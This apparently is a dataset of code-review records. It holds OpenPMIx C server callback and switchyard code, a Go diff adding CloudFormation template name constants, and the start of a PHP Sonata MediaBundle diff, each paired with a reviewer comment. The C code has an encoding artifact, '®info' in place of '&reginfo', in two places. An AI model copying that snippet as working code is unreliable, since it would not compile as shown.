} else {
/* is this a continuation of the current range? */
if (start == (rng->start + rng->cnt)) {
/* just add it to the end of this range */
rng->cnt++;
} else {
/* nope, there is a break - create new range */
rng = PMIX_NEW(pmix_regex_range_t);
rng->start = start;
rng->cnt = end - start + 1;
pmix_list_append(&vreg->ranges, &rng->super);
}
}
} else {
/* single rank given */
start = strtol(npn[j], NULL, 10);
/* are we collecting a range? */
if (NULL == rng) {
/* no - better start one */
rng = PMIX_NEW(pmix_regex_range_t);
rng->start = start;
rng->cnt = 1;
pmix_list_append(&vreg->ranges, &rng->super);
} else {
/* is this a continuation of the current range? */
if (start == (rng->start + rng->cnt)) {
/* just add it to the end of this range */
rng->cnt++;
} else {
/* nope, there is a break - create new range */
rng = PMIX_NEW(pmix_regex_range_t);
rng->start = start;
rng->cnt = 1;
pmix_list_append(&vreg->ranges, &rng->super);
}
}
}
}
pmix_argv_free(npn);
}
pmix_argv_free(ppn);
/* begin constructing the regular expression */
tmp = strdup("pmix[");
PMIX_LIST_FOREACH(vreg, &nodes, pmix_regex_value_t) {
while (NULL != (rng = (pmix_regex_range_t*)pmix_list_remove_first(&vreg->ranges))) {
if (1 == rng->cnt) {
if (0 > asprintf(&tmp2, "%s%d,", tmp, rng->start)) {
return PMIX_ERR_NOMEM;
}
} else {
if (0 > asprintf(&tmp2, "%s%d-%d,", tmp, rng->start, rng->start + rng->cnt - 1)) {
return PMIX_ERR_NOMEM;
}
}
free(tmp);
tmp = tmp2;
PMIX_RELEASE(rng);
}
/* replace the final comma */
tmp[strlen(tmp)-1] = ';';
}
/* replace the final semi-colon */
tmp[strlen(tmp)-1] = ']';
/* assemble final result */
*regexp = tmp;
PMIX_LIST_DESTRUCT(&nodes);
return PMIX_SUCCESS;
}
/**** THE FOLLOWING CALLBACK FUNCTIONS ARE USED BY THE HOST SERVER ****
**** THEY THEREFORE CAN OCCUR IN EITHER THE HOST SERVER'S THREAD ****
**** CONTEXT, OR IN OUR OWN THREAD CONTEXT IF THE CALLBACK OCCURS ****
**** IMMEDIATELY. THUS ANYTHING THAT ACCESSES A GLOBAL ENTITY ****
**** MUST BE PUSHED INTO AN EVENT FOR PROTECTION ****/
static void op_cbfunc(pmix_status_t status, void *cbdata)
{
pmix_server_caddy_t *cd = (pmix_server_caddy_t*)cbdata;
pmix_buffer_t *reply;
pmix_status_t rc;
/* no need to thread-shift here as no global data is
* being accessed */
/* setup the reply with the returned status */
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
PMIX_RELEASE(reply);
return;
}
/* the function that created the server_caddy did a
* retain on the peer, so we don't have to worry about
* it still being present - send a copy to the originator */
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
/* cleanup */
PMIX_RELEASE(cd);
}
static void _spcb(int sd, short args, void *cbdata)
{
pmix_shift_caddy_t *cd = (pmix_shift_caddy_t*)cbdata;
pmix_nspace_t *nptr, *ns;
pmix_buffer_t *reply;
pmix_status_t rc;
/* setup the reply with the returned status */
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &cd->status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
PMIX_RELEASE(cd->cd);
cd->active = false;
return;
}
if (PMIX_SUCCESS == cd->status) {
/* add any job-related info we have on that nspace - this will
* include the name of the nspace */
nptr = NULL;
PMIX_LIST_FOREACH(ns, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(ns->nspace, cd->nspace)) {
nptr = ns;
break;
}
}
if (NULL == nptr) {
/* shouldn't happen */
PMIX_ERROR_LOG(PMIX_ERR_NOT_FOUND);
} else {
pmix_bfrop.copy_payload(reply, &nptr->server->job_info);
}
}
/* the function that created the server_caddy did a
* retain on the peer, so we don't have to worry about
* it still being present - tell the originator the result */
PMIX_SERVER_QUEUE_REPLY(cd->cd->peer, cd->cd->hdr.tag, reply);
/* cleanup */
PMIX_RELEASE(cd->cd);
cd->active = false;
}
static void spawn_cbfunc(pmix_status_t status, char *nspace, void *cbdata)
{
pmix_shift_caddy_t *cd;
/* need to thread-shift this request */
cd = PMIX_NEW(pmix_shift_caddy_t);
cd->status = status;
cd->nspace = nspace;
    cd->cd = (pmix_server_caddy_t*)cbdata;
PMIX_THREADSHIFT(cd, _spcb);
PMIX_WAIT_FOR_COMPLETION(cd->active);
PMIX_RELEASE(cd);
}
static void lookup_cbfunc(pmix_status_t status, pmix_pdata_t pdata[], size_t ndata,
void *cbdata)
{
pmix_server_caddy_t *cd = (pmix_server_caddy_t*)cbdata;
pmix_buffer_t *reply;
pmix_status_t rc;
/* no need to thread-shift as no global data is accessed */
/* setup the reply with the returned status */
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
PMIX_RELEASE(reply);
return;
}
if (PMIX_SUCCESS == status) {
/* pack the returned data objects */
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &ndata, 1, PMIX_SIZE))) {
PMIX_ERROR_LOG(rc);
PMIX_RELEASE(reply);
return;
}
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, pdata, ndata, PMIX_PDATA))) {
PMIX_ERROR_LOG(rc);
PMIX_RELEASE(reply);
return;
}
}
/* the function that created the server_caddy did a
* retain on the peer, so we don't have to worry about
* it still being present - tell the originator the result */
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
/* cleanup */
PMIX_RELEASE(cd);
}
static void _mdxcbfunc(int sd, short argc, void *cbdata)
{
pmix_shift_caddy_t *scd = (pmix_shift_caddy_t*)cbdata;
pmix_server_trkr_t *tracker = scd->tracker;
pmix_buffer_t xfer, *bptr, *databuf, *bpscope, *reply;
pmix_nspace_t *nptr, *ns;
pmix_server_caddy_t *cd;
char *nspace;
int rank;
pmix_status_t rc = PMIX_SUCCESS;
int32_t cnt = 1;
char byte;
/* pass the blobs being returned */
PMIX_CONSTRUCT(&xfer, pmix_buffer_t);
if (PMIX_SUCCESS != scd->status) {
rc = scd->status;
goto finish_collective;
}
if (PMIX_COLLECT_INVALID == tracker->collect_type) {
rc = PMIX_ERR_INVALID_ARG;
goto finish_collective;
}
PMIX_LOAD_BUFFER(&xfer, scd->data, scd->ndata);
/* if data was returned, unpack and store it */
while (PMIX_SUCCESS == (rc = pmix_bfrop.unpack(&xfer, &byte, &cnt, PMIX_BYTE))) {
pmix_collect_t ctype = (pmix_collect_t)byte;
// Check that this blob was accumulated with the same data collection setting
if (ctype != tracker->collect_type) {
rc = PMIX_ERR_INVALID_ARG;
goto finish_collective;
}
// Skip the rest of the iteration if there is no data
if (PMIX_COLLECT_YES != tracker->collect_type) {
continue;
}
// Extract the node-wise blob containing rank data
cnt = 1;
if (PMIX_SUCCESS != (rc = pmix_bfrop.unpack(&xfer, &databuf, &cnt, PMIX_BUFFER))) {
rc = PMIX_ERR_DATA_VALUE_NOT_FOUND;
goto finish_collective;
}
// Loop over rank blobs
cnt = 1;
while (PMIX_SUCCESS == (rc = pmix_bfrop.unpack(databuf, &bptr, &cnt, PMIX_BUFFER))) {
/* unpack the nspace */
cnt = 1;
if (PMIX_SUCCESS != (rc = pmix_bfrop.unpack(bptr, &nspace, &cnt, PMIX_STRING))) {
PMIX_ERROR_LOG(rc);
goto finish_collective;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"server:modex_cbfunc unpacked blob for npsace %s", nspace);
/* find the nspace object */
nptr = NULL;
PMIX_LIST_FOREACH(ns, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(nspace, ns->nspace)) {
nptr = ns;
break;
}
}
if (NULL == nptr) {
                /* Shouldn't happen. The Fence is performed among a well-known
                 * set of processes in known namespaces. Consider this an
                 * unrecoverable fault.
*/
pmix_output_verbose(8, pmix_globals.debug_output,
"modex_cbfunc: unknown nspace %s, Fence ", nspace);
/*
                 * TODO: if some namespaces are OK and the bad one is not the first,
                 * the server is in an inconsistent state. Should we rely on the client to abort
                 * the computation, or is this our task?
*/
rc = PMIX_ERR_INVALID_NAMESPACE;
goto finish_collective;
}
/* unpack the rank */
cnt = 1;
if (PMIX_SUCCESS != (rc = pmix_bfrop.unpack(bptr, &rank, &cnt, PMIX_PROC_RANK))) {
PMIX_ERROR_LOG(rc);
goto finish_collective;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"client:unpack fence received blob for rank %d", rank);
/* there may be multiple blobs for this rank, each from a different scope */
cnt = 1;
while (PMIX_SUCCESS == (rc = pmix_bfrop.unpack(bptr, &bpscope, &cnt, PMIX_BUFFER))) {
/* don't store blobs to the sm dstore from local clients */
if (_my_client(nptr->nspace, rank)) {
continue;
}
pmix_kval_t *kp = PMIX_NEW(pmix_kval_t);
kp->key = strdup("modex");
PMIX_VALUE_CREATE(kp->value, 1);
kp->value->type = PMIX_BYTE_OBJECT;
PMIX_UNLOAD_BUFFER(bpscope, kp->value->data.bo.bytes, kp->value->data.bo.size);
/* store it in the appropriate hash */
if (PMIX_SUCCESS != (rc = pmix_hash_store(&nptr->server->remote, rank, kp))) {
PMIX_ERROR_LOG(rc);
}
#if defined(PMIX_ENABLE_DSTORE) && (PMIX_ENABLE_DSTORE == 1)
if (PMIX_SUCCESS != (rc = pmix_dstore_store(nptr->nspace, rank, kp))) {
PMIX_ERROR_LOG(rc);
}
#endif /* PMIX_ENABLE_DSTORE */
PMIX_RELEASE(kp); // maintain acctg
} // while bpscope
if (PMIX_ERR_UNPACK_READ_PAST_END_OF_BUFFER != rc) {
PMIX_ERROR_LOG(rc);
/*
                 * TODO: if some buffers are OK and the bad one is not the first,
                 * the server is in an inconsistent state. Should we rely on the client to abort
                 * the computation, or is this our task?
*/
goto finish_collective;
}
PMIX_RELEASE(bpscope);
PMIX_RELEASE(bptr);
cnt = 1;
}
if (PMIX_ERR_UNPACK_READ_PAST_END_OF_BUFFER != rc) {
goto finish_collective;
} else {
rc = PMIX_SUCCESS;
}
cnt = 1;
} // while bptr
if (PMIX_ERR_UNPACK_READ_PAST_END_OF_BUFFER == rc) {
rc = PMIX_SUCCESS;
}
finish_collective:
/* setup the reply, starting with the returned status */
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &rc, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
goto cleanup;
}
/* loop across all procs in the tracker, sending them the reply */
PMIX_LIST_FOREACH(cd, &tracker->local_cbs, pmix_server_caddy_t) {
PMIX_RETAIN(reply);
pmix_output_verbose(2, pmix_globals.debug_output,
"server:modex_cbfunc reply being sent to %s:%d",
cd->peer->info->nptr->nspace, cd->peer->info->rank);
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
}
cleanup:
    /* Protect the data from being free'd because the RM may pass
     * a pointer that points into the middle of some
     * buffer (the case with SLURM).
     * The RM is responsible for releasing the buffer
*/
xfer.base_ptr = NULL;
xfer.bytes_used = 0;
PMIX_DESTRUCT(&xfer);
PMIX_RELEASE(reply); // maintain accounting
pmix_list_remove_item(&pmix_server_globals.collectives, &tracker->super);
PMIX_RELEASE(tracker);
/* we are done */
if (NULL != scd->cbfunc.relfn) {
scd->cbfunc.relfn(scd->cbdata);
}
PMIX_RELEASE(scd);
}
static void modex_cbfunc(pmix_status_t status, const char *data, size_t ndata, void *cbdata,
pmix_release_cbfunc_t relfn, void *relcbd)
{
pmix_server_trkr_t *tracker = (pmix_server_trkr_t*)cbdata;
pmix_shift_caddy_t *scd;
pmix_output_verbose(2, pmix_globals.debug_output,
"server:modex_cbfunc called with %d bytes", (int)ndata);
if (NULL == tracker) {
/* nothing to do - but be sure to give them
* a release if they want it */
if (NULL != relfn) {
relfn(relcbd);
}
return;
}
/* need to thread-shift this callback as it accesses global data */
scd = PMIX_NEW(pmix_shift_caddy_t);
scd->status = status;
scd->data = data;
scd->ndata = ndata;
scd->tracker = tracker;
scd->cbfunc.relfn = relfn;
scd->cbdata = relcbd;
PMIX_THREADSHIFT(scd, _mdxcbfunc);
}
static void get_cbfunc(pmix_status_t status, const char *data, size_t ndata, void *cbdata,
pmix_release_cbfunc_t relfn, void *relcbd)
{
pmix_server_caddy_t *cd = (pmix_server_caddy_t*)cbdata;
pmix_buffer_t *reply, buf;
pmix_status_t rc;
pmix_output_verbose(2, pmix_globals.debug_output,
"server:get_cbfunc called with %d elements", (int)ndata);
/* no need to thread-shift here as no global data is accessed */
if (NULL == cd) {
/* nothing to do - but be sure to give them
* a release if they want it */
if (NULL != relfn) {
relfn(relcbd);
}
return;
}
/* setup the reply, starting with the returned status */
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
goto cleanup;
}
/* pack the blob being returned */
PMIX_CONSTRUCT(&buf, pmix_buffer_t);
PMIX_LOAD_BUFFER(&buf, data, ndata);
pmix_bfrop.copy_payload(reply, &buf);
buf.base_ptr = NULL;
buf.bytes_used = 0;
PMIX_DESTRUCT(&buf);
/* send the data to the requestor */
pmix_output_verbose(2, pmix_globals.debug_output,
"server:get_cbfunc reply being sent to %s:%d",
cd->peer->info->nptr->nspace, cd->peer->info->rank);
pmix_output_hexdump(5, pmix_globals.debug_output,
reply->base_ptr, (reply->bytes_used < 256 ? reply->bytes_used : 256));
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
cleanup:
/* if someone wants a release, give it to them */
if (NULL != relfn) {
relfn(relcbd);
}
PMIX_RELEASE(cd);
}
static void _cnct(int sd, short args, void *cbdata)
{
pmix_shift_caddy_t *scd = (pmix_shift_caddy_t*)cbdata;
pmix_server_trkr_t *tracker = scd->tracker;
pmix_buffer_t *reply;
pmix_status_t rc;
int i;
pmix_server_caddy_t *cd;
char **nspaces=NULL;
pmix_nspace_t *nptr;
pmix_buffer_t *job_info_ptr;
/* setup the reply, starting with the returned status */
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &scd->status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
goto cleanup;
}
if (PMIX_CONNECTNB_CMD == tracker->type) {
/* find the unique nspaces that are participating */
PMIX_LIST_FOREACH(cd, &tracker->local_cbs, pmix_server_caddy_t) {
pmix_argv_append_unique_nosize(&nspaces, cd->peer->info->nptr->nspace, false);
}
/* loop across all participating nspaces and include their
* job-related info */
for (i=0; NULL != nspaces[i]; i++) {
PMIX_LIST_FOREACH(nptr, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 != strcmp(nspaces[i], nptr->nspace)) {
continue;
}
job_info_ptr = &nptr->server->job_info;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &job_info_ptr, 1, PMIX_BUFFER))) {
PMIX_ERROR_LOG(rc);
pmix_argv_free(nspaces);
goto cleanup;
}
}
}
pmix_argv_free(nspaces);
}
/* loop across all procs in the tracker, sending them the reply */
PMIX_LIST_FOREACH(cd, &tracker->local_cbs, pmix_server_caddy_t) {
PMIX_RETAIN(reply);
pmix_output_verbose(2, pmix_globals.debug_output,
"server:cnct_cbfunc reply being sent to %s:%d",
cd->peer->info->nptr->nspace, cd->peer->info->rank);
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
}
cleanup:
PMIX_RELEASE(reply); // maintain accounting
pmix_list_remove_item(&pmix_server_globals.collectives, &tracker->super);
PMIX_RELEASE(tracker);
/* we are done */
PMIX_RELEASE(scd);
}
static void cnct_cbfunc(pmix_status_t status, void *cbdata)
{
pmix_server_trkr_t *tracker = (pmix_server_trkr_t*)cbdata;
pmix_shift_caddy_t *scd;
pmix_output_verbose(2, pmix_globals.debug_output,
"server:cnct_cbfunc called");
if (NULL == tracker) {
/* nothing to do */
return;
}
/* need to thread-shift this callback as it accesses global data */
scd = PMIX_NEW(pmix_shift_caddy_t);
scd->status = status;
scd->tracker = tracker;
PMIX_THREADSHIFT(scd, _cnct);
}
static void regevents_cbfunc(pmix_status_t status, void *cbdata)
{
pmix_status_t rc;
pmix_server_caddy_t *cd = (pmix_server_caddy_t*) cbdata;
pmix_buffer_t *reply;
pmix_output_verbose(2, pmix_globals.debug_output,
"server:regevents_cbfunc called status = %d", status);
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
}
// send reply
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
PMIX_RELEASE(cd);
}
static void notifyerror_cbfunc (pmix_status_t status, void *cbdata)
{
pmix_status_t rc;
pmix_server_caddy_t *cd = (pmix_server_caddy_t*) cbdata;
pmix_buffer_t *reply = PMIX_NEW(pmix_buffer_t);
pmix_output_verbose(2, pmix_globals.debug_output,
"server:notifyerror_cbfunc called status = %d", status);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
}
// send reply
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
PMIX_RELEASE(cd);
}
static void query_cbfunc(pmix_status_t status,
pmix_info_t *info, size_t ninfo,
void *cbdata,
pmix_release_cbfunc_t release_fn,
void *release_cbdata)
{
pmix_query_caddy_t *qcd = (pmix_query_caddy_t*)cbdata;
pmix_server_caddy_t *cd = (pmix_server_caddy_t*)qcd->cbdata;
pmix_buffer_t *reply = PMIX_NEW(pmix_buffer_t);
pmix_status_t rc;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:query callback with status %d", status);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
goto complete;
}
/* pack the returned data */
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &ninfo, 1, PMIX_SIZE))) {
PMIX_ERROR_LOG(rc);
goto complete;
}
if (0 < ninfo) {
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, info, ninfo, PMIX_INFO))) {
PMIX_ERROR_LOG(rc);
}
}
complete:
// send reply
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
// cleanup
PMIX_QUERY_FREE(qcd->queries, qcd->nqueries);
PMIX_RELEASE(qcd);
PMIX_RELEASE(cd);
}
/* the switchyard is the primary message handling function. Its purpose
* is to take incoming commands (packed into a buffer), unpack them,
* and then call the corresponding host server's function to execute
* them. Some commands involve only a single proc (i.e., the one
* sending the command) and can be executed while we wait. In these cases,
* the switchyard will construct and pack a reply buffer to be returned
* to the sender.
*
* Other cases (either multi-process collective or cmds that require
* an async reply) cannot generate an immediate reply. In these cases,
* the reply buffer will be NULL. An appropriate callback function will
* be called that will be responsible for eventually replying to the
* calling processes.
*
* Should an error be encountered at any time within the switchyard, an
* error reply buffer will be returned so that the caller can be notified,
* thereby preventing the process from hanging. */
static pmix_status_t server_switchyard(pmix_peer_t *peer, uint32_t tag,
pmix_buffer_t *buf)
{
pmix_status_t rc=PMIX_ERR_NOT_SUPPORTED;
int32_t cnt;
pmix_cmd_t cmd;
pmix_server_caddy_t *cd;
pmix_proc_t proc;
pmix_buffer_t *reply;
pmix_regevents_info_t *reginfo;
pmix_peer_events_info_t *prev;
/* retrieve the cmd */
cnt = 1;
if (PMIX_SUCCESS != (rc = pmix_bfrop.unpack(buf, &cmd, &cnt, PMIX_CMD))) {
PMIX_ERROR_LOG(rc);
return rc;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"recvd pmix cmd %d from %s:%d",
cmd, peer->info->nptr->nspace, peer->info->rank);
if (PMIX_REQ_CMD == cmd) {
reply = PMIX_NEW(pmix_buffer_t);
pmix_bfrop.copy_payload(reply, &(peer->info->nptr->server->job_info));
pmix_bfrop.copy_payload(reply, &(pmix_server_globals.gdata));
PMIX_SERVER_QUEUE_REPLY(peer, tag, reply);
return PMIX_SUCCESS;
}
if (PMIX_ABORT_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_abort(peer, buf, op_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_COMMIT_CMD == cmd) {
rc = pmix_server_commit(peer, buf);
return rc;
}
if (PMIX_FENCENB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_fence(cd, buf, modex_cbfunc, op_cbfunc))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_GETNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_get(buf, get_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_FINALIZE_CMD == cmd) {
pmix_output_verbose(2, pmix_globals.debug_output,
"recvd FINALIZE");
/* call the local server, if supported */
if (NULL != pmix_host_server.client_finalized) {
PMIX_PEER_CADDY(cd, peer, tag);
(void)strncpy(proc.nspace, peer->info->nptr->nspace, PMIX_MAX_NSLEN);
proc.rank = peer->info->rank;
/* since the client is finalizing, remove them from any event
* registrations they may still have on our list */
PMIX_LIST_FOREACH(reginfo, &pmix_server_globals.events, pmix_regevents_info_t) {
PMIX_LIST_FOREACH(prev, ®info->peers, pmix_peer_events_info_t) {
if (prev->peer == peer) {
pmix_list_remove_item(®info->peers, &prev->super);
PMIX_RELEASE(prev);
break;
}
}
}
/* now tell the host server */
if (PMIX_SUCCESS != (rc = pmix_host_server.client_finalized(&proc, peer->info->server_object,
op_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
}
/* turn off the recv event - we shouldn't hear anything
* more from this proc */
if (peer->recv_ev_active) {
event_del(&peer->recv_event);
peer->recv_ev_active = false;
}
return rc;
}
if (PMIX_PUBLISHNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_publish(peer, buf, op_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_LOOKUPNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_lookup(peer, buf, lookup_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_UNPUBLISHNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_unpublish(peer, buf, op_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_SPAWNNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_spawn(peer, buf, spawn_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_CONNECTNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_connect(cd, buf, false, cnct_cbfunc))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_DISCONNECTNB_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_connect(cd, buf, true, cnct_cbfunc))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_REGEVENTS_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
if (PMIX_SUCCESS != (rc = pmix_server_register_events(peer, buf, regevents_cbfunc, cd))) {
PMIX_RELEASE(cd);
}
return rc;
}
if (PMIX_DEREGEVENTS_CMD == cmd) {
pmix_server_deregister_events(peer, buf);
return PMIX_SUCCESS;
}
if (PMIX_NOTIFY_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
rc = pmix_server_event_recvd_from_client(peer, buf, notifyerror_cbfunc, cd);
return rc;
}
if (PMIX_QUERY_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
rc = pmix_server_query(peer, buf, query_cbfunc, cd);
return rc;
}
if (PMIX_LOG_CMD == cmd) {
PMIX_PEER_CADDY(cd, peer, tag);
rc = pmix_server_log(peer, buf, op_cbfunc, cd);
return rc;
}
return PMIX_ERR_NOT_SUPPORTED;
}
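/* message handler for server-side peer connections - route the incoming
 * buffer through the switchyard and return an error reply to the sender
 * if the switchyard reports a failure */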
static void server_message_handler(struct pmix_peer_t *pr, pmix_usock_hdr_t *hdr,
pmix_buffer_t *buf, void *cbdata)
{
pmix_peer_t *peer = (pmix_peer_t*)pr;
pmix_buffer_t *reply;
pmix_status_t rc;
pmix_output_verbose(2, pmix_globals.debug_output,
"SWITCHYARD for %s:%d:%d",
peer->info->nptr->nspace,
peer->info->rank, peer->sd);
rc = server_switchyard(peer, hdr->tag, buf);
/* send the return, if there was an error returned */
if (PMIX_SUCCESS != rc) {
reply = PMIX_NEW(pmix_buffer_t);
pmix_bfrop.pack(reply, &rc, 1, PMIX_STATUS);
PMIX_SERVER_QUEUE_REPLY(peer, hdr->tag, reply);
}
}
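/* return 1 if the given nspace/rank identifies one of our own
 * locally-connected clients, and 0 otherwise */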
static inline int _my_client(const char *nspace, pmix_rank_t rank)
{
pmix_peer_t *peer;
int i;
int local = 0;
for (i = 0; i < pmix_server_globals.clients.size; i++) {
if (NULL != (peer = (pmix_peer_t *)pmix_pointer_array_get_item(&pmix_server_globals.clients, i))) {
if (0 == strcmp(peer->info->nptr->nspace, nspace) && peer->info->rank == rank) {
local = 1;
break;
}
}
}
return local;
}
| 1 | 6,519 | This is going to create a problem - we are already encountering issues with the length of the usock pathname on recent Linux kernels as the temp directory base has moved down to the var directory under a name created by a hash. So adding another field to it is going to add to the problem. | openpmix-openpmix | c |
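The concern in the review note above is the AF_UNIX limit: sun_path in struct sockaddr_un is only about 104-108 bytes on common systems, so a rendezvous socket buried under a deep, hash-named temp directory can run out of room before any extra component is appended. Below is a minimal, illustrative C sketch of the kind of length guard a server could apply before binding; the helper name check_rendezvous_path and its error reporting are assumptions for illustration only, not part of the PMIx API.

#include <stdio.h>
#include <string.h>
#include <sys/un.h>

/* hypothetical helper: return 0 if the candidate rendezvous path fits in
 * sun_path (leaving room for the terminating NUL), -1 otherwise */
static int check_rendezvous_path(const char *rendezvous_path)
{
    const size_t max_len = sizeof(((struct sockaddr_un *)0)->sun_path);

    if (strlen(rendezvous_path) >= max_len) {
        fprintf(stderr, "rendezvous path too long for AF_UNIX (%zu >= %zu)\n",
                strlen(rendezvous_path), max_len);
        return -1;
    }
    return 0;
}

Such a check would not solve the underlying path-length problem, but it would surface the failure early with an explicit cause instead of a failed bind.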
@@ -31,3 +31,13 @@ type ApplicationGetter interface {
type ApplicationCreator interface {
CreateApplication(app *Application) error
}
+
+const (
+ // AppCfnTemplateNameFormat is the base output file name when `app package`
+ // is called. This is also used to render the pipeline CFN template.
+ AppCfnTemplateNameFormat = "%s.stack.yml"
+ // AppCfnTemplateConfigurationNameFormat is the base output configuration
+ // file name when `app package` is called. It's also used to render the
+ // pipeline CFN template.
+ AppCfnTemplateConfigurationNameFormat = "%s-%s.params.json"
+) | 1 | // Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
package archer
// Application represents a deployable service or task.
type Application struct {
Project string `json:"project"` // Name of the project this application belongs to.
Name string `json:"name"` // Name of the application, which must be unique within a project.
Type string `json:"type"` // Type of the application (LoadBalanced app, etc)
}
// ApplicationStore can List, Create and Get applications in an underlying project management store
type ApplicationStore interface {
ApplicationLister
ApplicationGetter
ApplicationCreator
}
// ApplicationLister fetches and returns a list of application from an underlying project management store
type ApplicationLister interface {
ListApplications(projectName string) ([]*Application, error)
}
// ApplicationGetter fetches and returns an application from an underlying project management store
type ApplicationGetter interface {
GetApplication(projectName string, applicationName string) (*Application, error)
}
// ApplicationCreator creates an application in the underlying project management store
type ApplicationCreator interface {
CreateApplication(app *Application) error
}
| 1 | 10,984 | What do you think about moving this to the `cloudformation` pkg? | aws-copilot-cli | go |
@@ -63,6 +63,11 @@ abstract class BaseProvider implements MediaProviderInterface
*/
protected $name;
+ /**
+ * @var array
+ */
+ protected $clones = [];
+
/**
* @param string $name
* @param Filesystem $filesystem | 1 | <?php
declare(strict_types=1);
/*
* This file is part of the Sonata Project package.
*
* (c) Thomas Rabaix <[email protected]>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Sonata\MediaBundle\Provider;
use Gaufrette\Filesystem;
use Sonata\CoreBundle\Validator\ErrorElement;
use Sonata\MediaBundle\CDN\CDNInterface;
use Sonata\MediaBundle\Generator\GeneratorInterface;
use Sonata\MediaBundle\Model\MediaInterface;
use Sonata\MediaBundle\Resizer\ResizerInterface;
use Sonata\MediaBundle\Thumbnail\ThumbnailInterface;
abstract class BaseProvider implements MediaProviderInterface
{
/**
* @var array
*/
protected $formats = [];
/**
* @var string[]
*/
protected $templates = [];
/**
* @var ResizerInterface
*/
protected $resizer;
/**
* @var Filesystem
*/
protected $filesystem;
/**
* @var GeneratorInterface
*/
protected $pathGenerator;
/**
* @var CDNInterface
*/
protected $cdn;
/**
* @var ThumbnailInterface
*/
protected $thumbnail;
/**
* @var string
*/
protected $name;
/**
* @param string $name
* @param Filesystem $filesystem
* @param CDNInterface $cdn
* @param GeneratorInterface $pathGenerator
* @param ThumbnailInterface $thumbnail
*/
public function __construct($name, Filesystem $filesystem, CDNInterface $cdn, GeneratorInterface $pathGenerator, ThumbnailInterface $thumbnail)
{
$this->name = $name;
